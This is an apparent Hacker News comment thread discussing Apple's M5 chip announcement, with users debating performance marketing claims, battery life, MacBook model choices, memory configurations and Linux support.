I think the most most basic integration w.r.t. email I want from Apple is that I want to set up another email program besides “Mail” as the default email program, but without having to set up Mail first.
heresie-dabord•2h ago
> Apple has also seemingly stopped caring about the quality and efficiency of their software.

Hardware has improved significantly, but it needs software to enable me to enjoy using it.

Apple is not the only major company that has completely abandoned the users.

The fastest CPUs and GPUs with the most RAM will not make me happier being targeted by commercial surveillance mechanisms, social-media applications, and hallucinating LLM systems.

Rover222•1h ago
iOS 26 is so bad. It's the first time I've really felt annoyed daily when using an Apple device. Basically on par with my Android experiences now.
justinator•3h ago
You know, 64% of statistics are made up.
cj•3h ago
I’m not sure I see the disconnect.

At our company we used to buy everyone MacBook Pros by default.

After the M-series chip, the MBPs are just too powerful and no longer necessary for the average white collar worker (they seem like “actual” pro machines, now) to the point where we now order MacBook Airs for new employees.

I feel like until recently, you really needed a MBP to get a decent UX (even just using chrome). But now there doesn’t seem to be a major compromise when buying an Air for half the price, at least compared to 3-5 years ago.

wlesieutre•2h ago
What's crazy about that to me is the Macbook Air doesn't even have a fan. The power efficiency of the ARM chips is really something.
charliebwrites•2h ago
Anecdotal, but I switched to an M3 MBA from an M1 MBP for my iOS and other dev related work

I’ve had zero problems with lag or compile time (prior to macOS 26 anyway)

The only thing it can’t do is run Ableton in a low latency way without strongly changing the defaults

You press a key on the keyboard to play a note and half a second later you hear it

Other than that, zero regrets

cyberpunk•2h ago
That’s weird, my m1 air handles ableton absolutely fine.

something’s off with your setup.

hartator•2h ago
> After the M-series chip, the MBPs are just too powerful and no longer necessary for the average white collar worker (they seem like “actual” pro machines, now) to the point where we now order regular MacBooks (not Pro’s) for new employees

Regular MBs are not really a thing anymore. You mean Airs?

cj•2h ago
Yes, fixed!
ahmeneeroe-v2•2h ago
Absolutely true. I now know that I only need an MBA, not an MBP.
hibikir•21m ago
In 2021, we bought everyone M1 Pros with 32 gigs of ram. Historically, keeping a developer in a 4 year old laptop would have been crazy, but nobody is really calling for upgrades, like we did back when we got rid of the Intels.
semiinfinitely•3h ago
All those extra flops are spent computing light refraction in the liquid glass of the ui
quitit•2h ago
You wrote:

>Looking at my Macbook though, I can say with utmost certainty that it isn't 4000x faster than the Intel one I had 5 years ago. So, where is the disconnect here?

They wrote:

> Together, they deliver up to 15 percent faster multithreaded performance over M4

The problem is comprehension, not marketing.

CryptoBanker•2h ago
I think you’re the one misreading here. The 15% refers to CPU speed while the 6x, etc. multiples refer to GPU speed
graeme•1h ago
GPU for ai workloads. That plausibly is that much faster as the intel laptops with integrated GPUs weren't made for that workload.
Choco31415•2h ago
Not quite. The announcement mentions that:

“M5 delivers over 4x the peak GPU compute performance for AI”

In this situation, at least, it’s just referring to AI compute power.

teaearlgraycold•12m ago
Much of this is probably down to optimized transformer kernels.
foota•2h ago
User experience (for most things, unless you sit there encoding video all day) isn't really related to raw performance so much as latency. Processor power can help there, but design and at the limit memory latency is the key constraint.
oulipo2•2h ago
Agreed, if I have 40 tabs opened on Chrome, my M1 macbook is no longer responsive... I'm not sure about their performance claims, apart from some niche GPU rendering for games, which constitutes about 0% of my daily laptop usage
0x457•2h ago
Well, if you read the very next thing after 4x, you will notice it says "the peak GPU compute performance for AI compared to M4".

The disconnect here is that you can't read. Sorry, no other way to say it.

potatolicious•2h ago
Because there's more to "actual user experience" than peak CPU/GPU/NPU workload.

Firstly, the M5 isn't 4-6x more powerful than M4 - the claim is only for GPU, only for one narrow workload, not overall performance uplift. Overall performance uplift looks like ~20% over M4, and probably +100% over M1 or so.

But there is absolutely a massive sea change in the MacBook since Intel 5 years ago: your peak workloads haven't changed much, but the hardware improvements give you radically different UX.

For one thing, the Intel laptops absolutely burned through the battery. Five years ago the notion of the all-day laptop was a fantasy. Even relatively light users were tethered to chargers most of the day. This is now almost fully a thing of the past. Unless your workloads are very heavy, it is now safe to charge the laptop once a day. I can go many hours in my workday without charging. I can go through a long flight without any battery anxiety. This is a massive change in how people use laptops.

Secondly is heat and comfort. The Intel Macs spun their fans up at even mild workloads, creating noise and heat - they were often very uncomfortably warm. Similar workloads are now completely silent with the device barely getting warmer than ambient temp.

Thirdly is allowing more advanced uses on lower-spec and less expensive machines. For example, the notion of rendering and editing video on a Intel MacBook Air was a total pipe dream. Now a base spec MacBook Air can do... a lot that once forced you into a much higher price point/size/weight.

A lot of these HN conversations feel like sports car fans complaining: "all this R&D and why doesn't my car go 500mph yet?" - there are other dimensions being optimized for!

leakycap•1h ago
> So, where is the disconnect here?

> I can say with utmost certainty that it isn't 4000x faster

The numbers you provided do not come to 4000x faster (closer to 2400x)

> Why is actual user experience not able to keep up with benchmarks and marketing?

Benchmarks and marketing are very different things, but you seem to be holding them up as similar here.

The 5x 6x 4x numbers you describe across marketing across many years don't even refer to the same thing. You're giving numbers with no context, which implies you're mixing them and the marketing worked because the only thing you're recalling is the big number.

Often, every M-series chip is a HUGE advancement over the past in GPU. Most of the "5x" performance jumps you describe are in graphics processing, and the "Intel" they're comparing it to is often an Intel iGPU like the Iris Xe or UHD series. These were low end trash iGPUs even when Apple launched those Intel devices, so being impressed by 5x performance when the M1 came out was in part because the Intel Macs had such terrible integrated graphics.

The M1 was a giant jump in overall system responsiveness, and the M-series seems to be averaging about a 20% year over year meaningful speed increase. If you use AI/ML/GPU, the M-series yearly upgrade is even better. Otherwise, for most things it's a nice and noticeable bump but not a Intel-to-M1 jump even from M1-to-M4.

omikun•1h ago
Says M5 is 4x faster than M4 and 6x faster than M1 for AI compute on the GPU. Basically M4 was only a little faster than M1 at this task. Ex. if M5 is 24 AI TOPS, M4 is 6 AI TOPS, and M1 is 4 AI TOPS.

Unless you're looking at your MacBook running LM Studio you won't be seeing much improvement in this regard.

pzo•3h ago
This is quite weird move and confusing (probably on purpose). This chip M5 is released in Macbook PRO but previous macbook pro had M4 Pro or M4 Max so their more like macbook air series to even like ipad pro series.

They say "M5 offers unified memory bandwidth of 153GB/s, providing a nearly 30 percent increase over M4" but my old Macbook M2 Max have 400GB/s

rcarmo•3h ago
I'll take one inside an iPad mini, thank you very much.
mattray0295•2h ago
They push these new generations out so quick, and with crazy performance boosts. Impressive
mrlonglong•2h ago
Good old Brits, taking over the world with an ISA extraordinarily efficient that at inception they discovered that the processor still kept operating by sucking voltage from leakage currents even though the power was off.

From: https://www.theregister.com/2012/05/03/unsung_heroes_of_tech...

"> The power test tools they were using were unreliable and approximate, but good enough to ensure this rule of thumb power requirement. When the first test chips came back from the lab on the 26 April 1985, Furber plugged one into a development board, and was happy to see it working perfectly first time.

> Deeply puzzling, though, was the reading on the multimeter connected in series with the power supply. The needle was at zero: the processor seemed to be consuming no power whatsoever.

> As Wilson tells it: “The development board plugged the chip into had a fault: there was no current being sent down the power supply lines at all. The processor was actually running on leakage from the logic circuits. So the low-power big thing that the ARM is most valued for today, the reason that it's on all your mobile phones, was a complete accident."

> Wilson had, it turned out, designed a powerful 32-bit processor that consumed no more than a tenth of a Watt."

busymom0•2h ago
> M5 brings its industry-leading power-efficient performance to the new 14-inch MacBook Pro, iPad Pro, and Apple Vision Pro

Not for Mac mini?

supernes•1h ago
They'll put it in the Mini when they push out a new Studio to upsell to.
looneysquash•2h ago
Thats cool, but so much software only supports CUDA.
allenrb•2h ago
I’d like a filter to remove all mention of AI and associated performance from copy like this. Maybe I can build it with… nvm.

Seriously, can’t you tell me about the CPU cores and their performance?

wina•1h ago
why do you want more CPU cores and better performance than the M4, if not for running local AI models?
adastra22•1h ago
COU cores aren’t relevant to running AI?
sib•1h ago
Photo & video post-processing...
Remnant44•1h ago
Essentially ever other use case for a computer.

Whether you're playing games, or editing videos, or doing 3D work, or trying to digest the latest bloated react mess on some website.. ;)

LarsDu88•1h ago
It's disappointing to me how far behind other chipmakers are in having unified gpu/cpu memory bus. Only AMD Strix Halo even attempts this. Well this announcement tipped my hand and I'm finally buying a new macbook :)
hereme888•1h ago
Base models only:

- M1 | 5 nm | 8 (4P+4E) | GPU 7–8 | 16-core Neural | Memory Bandwidth: 68.25 GB/s | Unified Memory: 16 GB | Geekbench6 ~2346 / 8346

- M2 | 5 nm (G2) | 8 (4P+4E) | GPU 8–10 | 16-core Neural | Memory Bandwidth: 100 GB/s | Unified Memory: 24 GB | Geekbench6 ~2586 / 9672

- M3 | 3 nm (first-gen) | 8 (4P+4E) | GPU 8–10 | 16-core Neural | Memory Bandwidth: 100 GB/s | Unified Memory: 24 GB | Geekbench6 ~2965 / 11565

- M4 | 3 nm (second-gen) | 10 (4P+6E) | GPU 8–10 | 16-core Neural | Memory Bandwidth: 120 GB/s | Unified Memory: 32 GB | Geekbench6 ~3822 / 15031

- M5 | 3 nm (third-gen) | 10 (4P+6E) | GPU 10 | 16-core Neural | Memory Bandwidth: 153 GB/s | Unified Memory: up to 32 GB | Geekbench6 ~4133 / 15,437 (9-core sample)

gigatexal•1h ago
Amazing. My M3Max is going to look like a paper-weight very soon. And that's fine by me. When I get an M6 or M7Max to replace it it'll be amazing.
bombcar•1h ago
I’m trying to find any reason I can that my M1 Max needs replacement; it’s hard. How do you justify it?
alexeldeib•57m ago
Fun one: https://incident.io/blog/festive-macbooks
nu11ptr•47m ago
I am in the same boat as my Rust compile times are solid. I'm good for now, but with the M4 max twice as fast, upgrading to the M5 max next year could be a tempting upgrade.
djtriptych•43m ago
Same. I have an M1 Max Studio and it's just laughing at the little workloads I throw at it (pro photo editing, music production, software dev, generally all at the same time).

It just never sweats AT ALL - it feels like a decade from obsolescence based on what I'm doing now.

It would have to be an order of magnitude faster for me to even notice at this point.

oblio•39m ago
You're not opening enough Chrome tabs. Or Electron apps.
andrepd•34m ago
You're clearly running low-intensity tasks (pro photo editing, music production, software dev, generally all at the same time) instead of highly-demanding ones (1 jira tab)
zahirbmirza•28m ago
Obsolescence for Macs comes when Apple decides not to allow your mac update the OS to the latest one.
phony-account•22m ago
> Obsolescence for Macs comes when Apple decides not to allow your mac update the OS to the latest one.

That doesn’t make it obsolete, at all.

poultron•21m ago
Obsolescence comes when Apple conveniently "optimizes" a new architecture in the OS for a new chip... that conveniently, ironically, somehow severely de-optimizes things for the old chips... and suddenly that shiny new OS feels slow and sluggish and clunky and "damn I need to upgrade my computer!." They'll whitewash it not as planned obsolescence but optimization for new products. Doesn't have to be that way, shouldn't be that way, but its incredibly profitable.
MPSimmons•13m ago
Maybe by that time ARM linux on this platform will be excellent and we can migrate to it for old gear. I still have a 2011 MBP running Linux on my electronics workbench and it is just fine.
montebicyclelo•27m ago
On the contrary; now might be a good time to get an M1 Max laptop. A second hand one, ex-corporate, in good condition, with 64Gb RAM, is pretty good value, compared to new laptops at the same price. It's still a fantastic CPU.
smith7018•2m ago
You should wait until next Fall if you don't really need to replace your M1 Max. Rumors say that Apple's going to redesign the Macbook Pros next year with an OLED screen.
rootusrootus•12m ago
I was thinking similar thoughts about my M2 Max MBP. I look at the newer chips and wonder at what point will (or has it happened already) will the base M chip outperform my M2 Max? I'll probably hold onto it a while anyway -- I think it will be a while before I find 96GB limiting or the CPU slow enough for my purposes, but I'd still like to know how things are progressing.
B1FF_PSUVM•1h ago
Thank you. Looking at replacing an Intel MacBook Air, I hope there are price drops on the "outdated" M4s (although an M2 phased out early this year would do well enough...)
nu11ptr•1h ago
The step down from 32GB to 24GB of unified memory is interesting. Theories? Perhaps they decided M4 allowed too much memory in the standard chip and they want to create a larger differential with Pro/Max chips?

Update: I am thinking the 24GB for M5 is a typo. I see on Apple's site the 14 inch MBP can be configured optionally with 32GB of RAM.

makeramen•1h ago
That seems like a typo or incorrect info, the M5 MBP definitely can be configured up to 32 GB, and the Apple page mentions 32 GB explicitly as well.
christkv•1h ago
the still have an option for 32GB
eftychis•1h ago
I had the same question, but I can only speculate at the moment. The cynical part of me thinks in a similar line: create an artificial differentiation and push people to upgrade.

If anyone has any real clues that they can share pseudonymously, that would be great. Not sure which department drove that change.

ElijahLynn•1h ago
Thank you! Since this is the top rated comment, can you also add M1 and M2 as well?
rick_dalton•42m ago
The multi-core geekbench score for the M5 is the 9 core version iirc. The 10 core score isn't out yet as far as I know.
morshu9001•39m ago
And the fastest M4 max was already fastest single and multicore CPU by a decent margin, while the fastest non-Apple CPU was only specialized for single or multi.
jjcm•39m ago
They're going to have a hard time selling the M5 when compared to the M4 Pro. Geekbench for that chip is 3843/22332, which is slightly slower for single core but better for multi, but also has thunderbolt 5 instead of 4.
GeekyBear•29m ago
The numbers for M5 Geekbench are for the binned iPad Pro version with one performance core disabled.

It's the only M5 device that leaked to the public early.

jay_kyburz•8m ago
Serious questions. How is Asahi these days? Is it ready as a daily driver? Is it getting support from Apple or are they hostile to it? Are there missing features? And can I run KDE on it?
jay_kyburz•5m ago
nevermind. Found this. Still a ways to go. https://asahilinux.org/docs/platform/feature-support/m4/#tab...
t1234s•1h ago
Any reason they don't have an apple TV pro with an M* chip that's targeted towards gaming?
quentindanjou•59m ago
I think it is because there are not enough games to be the reason for integrating an M* chip.
textlapse•1h ago
I wonder how much of the nVidia DGX Spark announcement was meant to precede this M5 announcement by a day or two; M5 MBP has higher performance with a monitor attached and with a (bit) lower price tag.

If you could yank the screen out, it probably evens out :)

I have seen quite a few such announcements from competitors that tend to be so close that I wonder if they have some competitor analysis to precede the Goliath by a few days (like Google vs rest, Apple vs rest etc).

ChuckMcM•59m ago
I think it would be amazing to be able to buy an M5 based open platform.
mgaunard•54m ago
why is Apple focusing on AI? do they have any AI products like Google, Meta or OpenAI?
drnick1•32m ago
A lot of Apple hardware is impressive on paper, but I will never buy a Mac that can't run Linux. I simply don't want to live in Apple's walled garden.

Then there is the whole ARM vs x86 issue. Even if a compatible Linux distro were made, I expect to run all kinds of software on my desktop rig including games, and ARM is still a dead end for that. For laptops, it's probably a sensible choice now, but we're still far from truly free and usable ARM desktop.

anteloper•9m ago
I can't find a single moore's law chart that includes 2025 data (they all seem to cut off around 2020 actually).

Does anyone know if we're still on pace with Moore's law?

umvi•5m ago
I would buy a mac mini with an M* chip in the blink of an eye if merely upgrading the RAM didn't double the cost of the unit